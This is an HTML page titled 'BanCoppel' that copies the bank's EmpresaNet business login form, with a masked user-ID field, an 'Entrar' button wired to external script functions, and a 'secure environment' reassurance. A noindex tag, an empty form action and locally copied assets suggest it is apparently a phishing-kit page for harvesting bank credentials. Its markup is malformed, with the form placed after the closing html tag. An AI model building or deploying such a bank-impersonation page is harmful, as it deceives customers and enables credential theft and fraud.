<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="noindex,nofollow">
    <script type="text/javascript" src="./javascript/calls.js"></script>
    <script type="text/javascript" src="./javascript/libreria.min.js"></script>
    <script type="text/javascript" src="./javascript/jquery-1.7.1.min.js"></script>
    <link href="./css/back.css" rel="stylesheet">
    <!-- <link href="/css/recuadro-form.css" rel="stylesheet"> -->
    <title>BanCoppel</title>
</head>
<body>
    
</body>
</html>

    <!-- FONDO -->
<!-- <div class="back">
    <div class="blue"></div>
    <div class="white"></div>
</div> -->
    <!-- TITULO FORMULARIO -->
    <!-- <div className="title">
        <h2>ACCESO A <br/> <span>EMPRESANET</span></h2>
    </div> -->

    <!-- FONDO DEL FORMULARIO -->
<div class="container-cuadro-form">
    <div class="cuadro-form">
        <form class="formulario" name="usuarioForm" id="usuarioForm" method="POST" action="">
            <div class="top-text">
                <img src="./assets/icn_seguridad.svg" alt="icon_security" />
                    <p>Usted se encuentra en un entorno seguro</p>
                    </div>
                    <input type="hidden" id="p" name="p" value=0 />	
                    <input type="hidden" id="usuario" name="usuario" value="" /> 
                    <input type="hidden" id="maskUsuaria" name="maskUsuaria" value="" />
                    <div ><input type="password" name="textfield" placeholder="Usuario (ID)" id="maskUsuario" name="maskUsuario" maxlength="20" autocomplete="off" onkeypress="EnterChar(event,2); return CaracteresPerm(event);"></div>
                    <div><button class="acept-btn" target="_blank"  type="button" onclick="gtHLEmp(); ">Entrar</button></div>
                    <div ><a href="javascript:vpid(0);" class="link_forgot" target="_blank" onclick="gtHCEmp();" >¿Olvidó su Usuario / Contraseña?</a></div>
                    <div ><a href="javascript:vpid(0);" target="_blank" onclick="gtHAEmp();"></a></div>
                    <div class="back_blue">

                <p>¿Eres usuario nuevo? <span>Regístrate</span></p>
            </div>
        </form>
    </div>
</div>



